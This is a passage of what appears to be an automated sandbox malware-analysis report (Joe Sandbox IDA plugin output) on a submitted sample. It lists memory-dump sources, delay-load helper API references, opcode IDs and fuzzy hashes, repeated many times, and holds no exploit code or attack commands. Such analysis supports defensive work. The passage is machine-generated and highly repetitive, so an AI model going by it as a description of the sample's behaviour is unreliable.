                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E3FC
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E580
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E51F
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c0e4bdac161eba8e5c1e61c6d704edf3344f98a5684a228bff987d2d00ce7d0c
                                                                                                                    • Instruction ID: a92f3b87ad9c77cb1c7c309e3c3ca1c57a6aa7eb9449c3a8f01df8d9e838ef50
                                                                                                                    • Opcode Fuzzy Hash: c0e4bdac161eba8e5c1e61c6d704edf3344f98a5684a228bff987d2d00ce7d0c
                                                                                                                    • Instruction Fuzzy Hash: F0B012C22681407D3604E1495C47E7B06CCC0C2F1033083FEF425C2091FC80CC440431
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: a64de4ab091dd57812260dbff0c1cf6f567459e6578942dad05576fb968d6587
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: a64de4ab091dd57812260dbff0c1cf6f567459e6578942dad05576fb968d6587
                                                                                                                    • Instruction Fuzzy Hash: 45A011E22A8002BC3808E2822C83C3B028CC0C0B2033088FEF822C8080AC80A8800830
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 0ba9850c3fffa020372a701ca6a194e129b43824b74d4a45006292197b6d7a09
                                                                                                                    • Instruction ID: c0b3793d047cbe1162a3e2fad151fa0fac38426e06eb6065285b5e181203ad34
                                                                                                                    • Opcode Fuzzy Hash: 0ba9850c3fffa020372a701ca6a194e129b43824b74d4a45006292197b6d7a09
